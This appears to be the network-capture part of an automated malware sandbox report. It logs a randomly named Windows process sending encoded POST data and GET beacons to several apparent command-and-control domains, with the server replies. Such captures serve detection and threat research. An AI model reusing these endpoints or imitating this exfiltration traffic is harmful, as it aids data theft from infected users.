                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 58 34 63 6e 73 31 2b 59 73 37 47 35 32 75 73 77 51 50 6a 76 52 68 4a 34 33 51 31 66 52 47 71 67 66 43 39 4a 73 43 6a 65 43 4f 6e 56 63 36 4b 55 49 6d 4f 76 63 37 38 6d 36 67 42 65 47 63 43 57 4f 54 59 6b 78 39 76 57 42 74 7a 6b 6a 59 43 52 74 58 72 41 58 63 73 34 4b 64 63 49 41 4e 50 62 65 6b 38 5a 51 4f 6b 74 6b 64 50 57 55 53 74 4f 6b 78 6e 44 6a 63 51 79 43 59 4f 5a 43 34 43 4b 65 78 55 66 64 64 49 2b 6a 72 68 4c 48 4f 72 55 68 70 76 6f 4b 76 56 79 51 65 4b 42 74 6c 43 42 35 73 37 6c 50 78 4d 2f 47 43 4b 61 4c 44 46 73 55 61 64 39 41 64 79 42 36 37 41 72 4b 6d 76 45 32 76 37 73 4f 6a 4d 45 51 79 50 6f 76 48 4a 46 4e 4d 5a 47 34 6d 4a 52 46 2b 65 36 37 6e 46 32 47 6e 6a 77 66 4e 43 73 61 68 32 50 62 66 59 75 4e 4c 55 70 34 6b 2b 47 75 61 46 59 71 4b 2b 57 32 57 37 32 62 74 50 38 6b 72 69 70 2b 74 33 56 37 75 61 45 56 56 56 45 74 48 46 4c 78 54 67 2f 6c 56 65 61 53 42 65 6a 79 6d 63 73 52 53 42 49 41 32 6d 30 67 36 6c 34 5a 56 44 6e 4e 74 31 63 52 41 44 65 52 79 4b 6e 34 76 4c 63 5a [TRUNCATED]
                                              Data Ascii: k06T=X4cns1+Ys7G52uswQPjvRhJ43Q1fRGqgfC9JsCjeCOnVc6KUImOvc78m6gBeGcCWOTYkx9vWBtzkjYCRtXrAXcs4KdcIANPbek8ZQOktkdPWUStOkxnDjcQyCYOZC4CKexUfddI+jrhLHOrUhpvoKvVyQeKBtlCB5s7lPxM/GCKaLDFsUad9AdyB67ArKmvE2v7sOjMEQyPovHJFNMZG4mJRF+e67nF2GnjwfNCsah2PbfYuNLUp4k+GuaFYqK+W2W72btP8krip+t3V7uaEVVVEtHFLxTg/lVeaSBejymcsRSBIA2m0g6l4ZVDnNt1cRADeRyKn4vLcZb+C/ycaFNntM+IbAB7jyh7UiBqlvX+g01d4MEboE8j42B4b0ezpVsU0IlnLHWhaO1bXS5piV8jOnmhmHUWSJ2EizhJcOaKr5De9+cfEXdSF0hiAEAxaIMuV40p3Zow1jgdCMmObQxvR8ea1+q5JEWUqiw9AqxeEm+umyN3ai4BYd0duRiTz/VewCYYvqXR6vcMqUvDhyyjz+BnknlzTidBSa6mFcab45zQQdyv/Rf7f5RcljH9MqgjUV/VrclrCkTFCwZ+plwMNePRSQfVmVMyuWWlwzMAcGHfEbPMOx9HXXTP+i3Kv4t22MahR3WPldiTdiR6Am1UoDBpZGpiQEYyhlv6X0epcAIWj5Bw4CCjXrSMBmMCJdpLtjV/gULDft7oxosfYDA6HV6x+o+nHtLchobJFTKQ/hxHrDLAn4IJ5yGmOW+dV4uhD/o4JXEd335m6B082hR/05w8foaW89HY9tKHl0JSv0PIp2oZONBlZgTmWv2o2I7Aom+SEUyaMPUJ6y/Xqo2mwhs0NU7+kiqCv2SqGylA/sY6o2P6TGI2FdVpNOtZQ0h4ZtrwoUU64Zpu4EtpuneJthNk8VT+acnMp6rkvDjgzPP/XHb+/GogUP4Ix8NglXOnFZOSFc2dIj+40iKefd//Gn3pxcUSqNDmsUYcXkbnizOY [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.54972143.155.26.241805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:40:17.198282957 CEST545OUTGET /kwl6/?k06T=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.cwgehkk.store
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.5497223.33.130.190805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:40:43.629817009 CEST805OUTPOST /nml2/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.mybodyradar.net
                                              Origin: http://www.mybodyradar.net
                                              Referer: http://www.mybodyradar.net/nml2/
                                              Content-Length: 205
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 4b 4e 41 6b 76 50 71 4a 6d 33 51 70 7a 79 6d 65 43 30 42 58 51 52 53 4d 31 34 56 39 6c 32 54 37 77 6c 64 51 2b 38 62 6c 62 6a 54 4f 78 72 62 70 71 45 66 57 69 67 58 6c 75 50 68 71 76 30 46 6a 34 6b 39 65 70 46 36 33 51 76 73 4a 50 74 58 72 6c 4c 47 6a 6c 41 41 5a 49 50 64 32 5a 50 69 74 37 42 6c 67 2f 79 59 34 75 47 63 73 45 41 70 4e 73 37 6a 4f 74 76 69 69 2b 66 65 61 53 66 6f 63 33 70 59 45 4a 76 62 71 76 32 41 75 61 2f 45 77 33 4b 31 55 33 46 74 67 48 76 45 4c 41 50 71 70 52 55 78 79 55 34 54 4f 62 42 4c 65 71 37 75 33 59 44 6b 6d 4d 70 78 63 75 33 77 2b 2f 6e 71 51 41 65 5a 31 65 61 30 3d
                                              Data Ascii: k06T=KNAkvPqJm3QpzymeC0BXQRSM14V9l2T7wldQ+8blbjTOxrbpqEfWigXluPhqv0Fj4k9epF63QvsJPtXrlLGjlAAZIPd2ZPit7Blg/yY4uGcsEApNs7jOtvii+feaSfoc3pYEJvbqv2Aua/Ew3K1U3FtgHvELAPqpRUxyU4TObBLeq7u3YDkmMpxcu3w+/nqQAeZ1ea0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.5497233.33.130.190805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:40:46.168713093 CEST825OUTPOST /nml2/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.mybodyradar.net
                                              Origin: http://www.mybodyradar.net
                                              Referer: http://www.mybodyradar.net/nml2/
                                              Content-Length: 225
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 4b 4e 41 6b 76 50 71 4a 6d 33 51 70 38 7a 57 65 45 58 70 58 46 42 53 50 35 59 56 39 76 57 54 2f 77 6c 52 51 2b 39 76 54 62 56 6a 4f 78 4c 72 70 37 31 66 57 6a 67 58 6c 36 2f 68 6a 68 55 46 73 34 6b 77 6a 70 42 36 33 51 76 34 4a 50 74 48 72 6d 38 53 6b 33 67 41 66 44 76 64 77 58 76 69 74 37 42 6c 67 2f 79 63 47 75 47 55 73 45 77 5a 4e 74 65 50 4e 6a 50 69 74 35 66 65 61 57 66 6f 59 33 70 5a 52 4a 72 62 4d 76 31 34 75 61 2b 30 77 33 62 31 58 39 46 74 69 61 2f 46 5a 4f 2f 4c 5a 4a 6e 68 61 65 4b 43 4f 43 52 58 54 69 74 44 64 43 68 73 4f 66 4a 64 6b 2b 6b 34 4a 75 58 4c 35 61 39 4a 46 41 4e 6a 69 44 79 51 36 78 73 66 76 74 6f 33 4b 45 35 79 48 56 30 78 32
                                              Data Ascii: k06T=KNAkvPqJm3Qp8zWeEXpXFBSP5YV9vWT/wlRQ+9vTbVjOxLrp71fWjgXl6/hjhUFs4kwjpB63Qv4JPtHrm8Sk3gAfDvdwXvit7Blg/ycGuGUsEwZNtePNjPit5feaWfoY3pZRJrbMv14ua+0w3b1X9Ftia/FZO/LZJnhaeKCOCRXTitDdChsOfJdk+k4JuXL5a9JFANjiDyQ6xsfvto3KE5yHV0x2


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.5497243.33.130.190805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:40:48.709886074 CEST1842OUTPOST /nml2/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.mybodyradar.net
                                              Origin: http://www.mybodyradar.net
                                              Referer: http://www.mybodyradar.net/nml2/
                                              Content-Length: 1241
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 4b 4e 41 6b 76 50 71 4a 6d 33 51 70 38 7a 57 65 45 58 70 58 46 42 53 50 35 59 56 39 76 57 54 2f 77 6c 52 51 2b 39 76 54 62 56 72 4f 78 59 6a 70 70 6d 48 57 35 67 58 6c 35 2f 68 75 68 55 46 78 34 6b 34 6e 70 42 2b 4e 51 73 41 4a 4f 4c 4c 72 78 2b 71 6b 75 51 41 66 4d 50 64 78 5a 50 69 43 37 42 56 73 2f 78 30 47 75 47 55 73 45 79 42 4e 6f 37 6a 4e 75 76 69 69 2b 66 65 57 53 66 6f 77 33 70 51 71 4a 72 66 36 76 45 59 75 61 65 6b 77 78 70 4e 58 78 46 74 73 4a 50 45 63 4f 2f 48 47 4a 6e 39 77 65 4c 32 30 43 54 58 54 79 36 2b 4c 51 78 67 45 49 36 52 75 77 57 41 71 32 6e 4c 55 5a 74 34 7a 42 66 79 59 49 6a 77 4f 2b 73 62 57 6a 35 69 6d 54 4e 36 45 51 43 51 48 64 59 37 71 48 31 69 44 33 68 51 70 6f 46 41 4f 6d 4a 56 49 4b 4e 37 56 41 50 4f 4c 56 79 48 4a 4d 5a 45 54 4e 49 43 39 64 69 68 58 4c 39 44 68 4c 59 30 5a 55 38 51 36 6d 6e 56 72 56 6d 4d 37 31 5a 33 6a 6b 52 6c 7a 4f 4d 76 66 79 74 56 62 61 34 35 65 75 65 70 41 30 57 33 6f 67 42 79 67 2f 59 63 53 6a 4f 51 50 54 50 38 54 6b 56 61 55 76 [TRUNCATED]
                                              Data Ascii: k06T=KNAkvPqJm3Qp8zWeEXpXFBSP5YV9vWT/wlRQ+9vTbVrOxYjppmHW5gXl5/huhUFx4k4npB+NQsAJOLLrx+qkuQAfMPdxZPiC7BVs/x0GuGUsEyBNo7jNuvii+feWSfow3pQqJrf6vEYuaekwxpNXxFtsJPEcO/HGJn9weL20CTXTy6+LQxgEI6RuwWAq2nLUZt4zBfyYIjwO+sbWj5imTN6EQCQHdY7qH1iD3hQpoFAOmJVIKN7VAPOLVyHJMZETNIC9dihXL9DhLY0ZU8Q6mnVrVmM71Z3jkRlzOMvfytVba45euepA0W3ogByg/YcSjOQPTP8TkVaUvcdRJOHy/HcNLXUZhPGOeNI+D58EIEXRVdJF5Sn7yJNaFyn+JrM1GWqD+6D/zfnZgR6NiiTpjFTBz3ISsHyDMOyPepO5hR4VrGY2XOBrzQB67n0FhZzza3zTsSldWoosWDntZ+1Dfv2mRVd8v8lhcGLzPjCM+zjNrkuXYSf5drifNkTxgwAi7y43ITrhjwiGK3hGAoP+KgfGogdOvr9Jj2FdEyTV4SPf7xVJYKAXKiYtiAYMIcm1qp86V3W/hj5l0uAuuZTL6YabsIqzZd9Q16PQ4fP3JdWaomH93Em6YW0pPq3t/IN+B4GaM8lCRfPHBrd1SWnT+gi7faWlG6f00pajeiMy72M50a3VvGT0CvbkbvrugZ9FHVSSYjZxbXh6mD0spPp8aJb94EGf68P0RjrRLZ3ap5/Q13C4bdoP+byWVqjvk+R26nk4zjH1O+C3LA3zqeM3nGMeuazHOJK1YDjug+JpZPXOLHtI3wiLQrjdqn22PzX0NjWOJALmQsZLAgC9V+Hx0VWUdM609shM6STcGjcIa6bGHCjF9WQk0kV28qOH8G1ktoW+6sTWrOZNhOdd5SGljcbDy0O8tMlcDq3jmuON5+K4D6qlDAPfaTzK5jjZQ95m61TeYIslP6zDakcReMp07a+gg4mDGCb/s3sJvTlh74QB3UJ [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.5497253.33.130.190805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:40:51.248119116 CEST547OUTGET /nml2/?k06T=HPoEs5HSsEYYnAW6PVozIACR+89TlHzFxT1N2ofTBBi/nJmbqmnSjRqVxPoNn0pwlxgNo3SmadBTH7enssKrgG8HFM9ue4Cv/jlK8Hwkml5mQyRFpKLBj5uVntz3S/FMqw==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mybodyradar.net
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Jul 3, 2024 16:40:51.772938013 CEST412INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Wed, 03 Jul 2024 14:40:51 GMT
                                              Content-Type: text/html
                                              Content-Length: 272
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6b 30 36 54 3d 48 50 6f 45 73 35 48 53 73 45 59 59 6e 41 57 36 50 56 6f 7a 49 41 43 52 2b 38 39 54 6c 48 7a 46 78 54 31 4e 32 6f 66 54 42 42 69 2f 6e 4a 6d 62 71 6d 6e 53 6a 52 71 56 78 50 6f 4e 6e 30 70 77 6c 78 67 4e 6f 33 53 6d 61 64 42 54 48 37 65 6e 73 73 4b 72 67 47 38 48 46 4d 39 75 65 34 43 76 2f 6a 6c 4b 38 48 77 6b 6d 6c 35 6d 51 79 52 46 70 4b 4c 42 6a 35 75 56 6e 74 7a 33 53 2f 46 4d 71 77 3d 3d 26 72 7a 3d 4c 5a 73 6c 2d 62 6b 70 2d 58 66 58 65 52 4c 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?k06T=HPoEs5HSsEYYnAW6PVozIACR+89TlHzFxT1N2ofTBBi/nJmbqmnSjRqVxPoNn0pwlxgNo3SmadBTH7enssKrgG8HFM9ue4Cv/jlK8Hwkml5mQyRFpKLBj5uVntz3S/FMqw==&rz=LZsl-bkp-XfXeRLp"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.549726203.161.55.102805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:40:57.146461010 CEST796OUTPOST /tb8p/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.lacemalt.top
                                              Origin: http://www.lacemalt.top
                                              Referer: http://www.lacemalt.top/tb8p/
                                              Content-Length: 205
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 6e 4d 69 30 42 47 77 71 58 4e 49 41 5a 6b 72 54 47 4d 39 7a 61 4a 66 56 47 4b 6c 67 37 41 70 45 38 65 39 33 71 36 67 59 59 55 2f 50 50 43 68 63 45 2f 55 68 71 49 53 56 6d 37 63 56 2f 32 64 55 78 55 42 5a 64 72 6c 76 47 30 72 39 67 79 56 57 63 44 71 70 30 49 53 33 62 30 61 54 48 65 39 5a 68 72 33 6f 52 63 51 32 34 65 56 4c 39 54 33 6c 6f 57 71 7a 36 62 73 78 75 46 47 5a 37 39 43 43 4e 46 69 78 64 75 70 64 38 50 72 45 41 30 51 58 44 6b 44 6f 71 6b 65 6d 42 5a 44 61 6c 65 4b 4e 30 6d 46 6b 41 68 54 77 6e 33 36 52 41 49 74 4e 50 64 6e 56 68 58 49 4f 35 68 71 6e 65 7a 52 2b 52 46 38 73 4c 75 55 3d
                                              Data Ascii: k06T=nMi0BGwqXNIAZkrTGM9zaJfVGKlg7ApE8e93q6gYYU/PPChcE/UhqISVm7cV/2dUxUBZdrlvG0r9gyVWcDqp0IS3b0aTHe9Zhr3oRcQ24eVL9T3loWqz6bsxuFGZ79CCNFixdupd8PrEA0QXDkDoqkemBZDaleKN0mFkAhTwn36RAItNPdnVhXIO5hqnezR+RF8sLuU=
                                              Jul 3, 2024 16:40:57.752840996 CEST533INHTTP/1.1 404 Not Found
                                              Date: Wed, 03 Jul 2024 14:40:57 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.549727203.161.55.102805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:40:59.690541983 CEST816OUTPOST /tb8p/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.lacemalt.top
                                              Origin: http://www.lacemalt.top
                                              Referer: http://www.lacemalt.top/tb8p/
                                              Content-Length: 225
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 6e 4d 69 30 42 47 77 71 58 4e 49 41 62 45 62 54 4c 4f 56 7a 50 35 66 61 4c 61 6c 67 30 67 6f 4e 38 65 78 33 71 37 6c 54 59 47 72 50 4f 6a 52 63 56 4f 55 68 74 49 53 56 2b 72 63 55 79 57 64 66 78 55 4d 6d 64 70 42 76 47 33 58 39 67 7a 6c 57 66 30 32 71 30 59 53 35 51 55 62 56 4a 2b 39 5a 68 72 33 6f 52 63 30 63 34 65 4e 4c 2b 6a 48 6c 6e 58 71 73 6c 72 73 32 2b 6c 47 5a 2f 39 43 47 4e 46 69 58 64 71 68 6e 38 4b 76 45 41 32 49 58 44 52 76 76 7a 55 65 67 46 5a 43 58 69 76 6e 67 38 31 59 6c 66 43 36 52 6e 52 75 72 42 2b 41 6e 56 2f 76 39 79 33 6b 32 70 79 69 51 50 44 77 58 4c 6d 73 63 56 35 43 2f 58 50 44 51 30 77 4c 31 31 2b 56 79 6d 56 74 4a 63 34 49 79
                                              Data Ascii: k06T=nMi0BGwqXNIAbEbTLOVzP5faLalg0goN8ex3q7lTYGrPOjRcVOUhtISV+rcUyWdfxUMmdpBvG3X9gzlWf02q0YS5QUbVJ+9Zhr3oRc0c4eNL+jHlnXqslrs2+lGZ/9CGNFiXdqhn8KvEA2IXDRvvzUegFZCXivng81YlfC6RnRurB+AnV/v9y3k2pyiQPDwXLmscV5C/XPDQ0wL11+VymVtJc4Iy
                                              Jul 3, 2024 16:41:00.285546064 CEST533INHTTP/1.1 404 Not Found
                                              Date: Wed, 03 Jul 2024 14:41:00 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.549728203.161.55.102805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:41:02.231278896 CEST1833OUTPOST /tb8p/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.lacemalt.top
                                              Origin: http://www.lacemalt.top
                                              Referer: http://www.lacemalt.top/tb8p/
                                              Content-Length: 1241
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 6e 4d 69 30 42 47 77 71 58 4e 49 41 62 45 62 54 4c 4f 56 7a 50 35 66 61 4c 61 6c 67 30 67 6f 4e 38 65 78 33 71 37 6c 54 59 48 54 50 50 52 70 63 48 5a 67 68 73 49 53 56 67 37 63 4a 79 57 64 43 78 55 55 69 64 70 4e 2f 47 79 62 39 6d 52 74 57 65 47 65 71 74 6f 53 35 66 30 62 46 48 65 39 4d 68 6f 50 6b 52 63 45 63 34 65 4e 4c 2b 67 50 6c 75 6d 71 73 2b 72 73 78 75 46 47 72 37 39 43 69 4e 46 62 69 64 71 74 33 38 35 6e 45 41 57 59 58 42 44 33 76 37 55 65 69 4c 35 44 45 69 76 72 6a 38 31 46 65 66 43 2b 33 6e 57 61 72 4e 49 31 48 4a 73 6e 58 6e 48 67 43 37 7a 79 72 62 33 64 78 42 6d 38 49 4b 35 2f 62 53 66 4c 6e 2f 48 2f 4a 35 66 59 68 37 30 6c 6e 66 38 68 69 44 2b 5a 53 41 68 6b 71 32 2f 37 4f 65 38 41 4e 42 75 4a 4d 4c 57 6f 49 6b 74 65 6f 62 6d 2b 63 64 4f 39 57 6e 7a 6f 67 45 4b 4c 41 4c 44 6d 46 73 45 4c 73 39 31 33 42 65 46 4a 70 69 75 76 6c 45 2b 43 71 63 51 4f 59 32 65 74 2b 64 50 46 4f 52 63 53 59 57 36 59 7a 4a 4d 77 6e 59 56 35 32 44 75 77 75 78 66 31 64 54 65 45 68 6b 62 6c 52 36 [TRUNCATED]
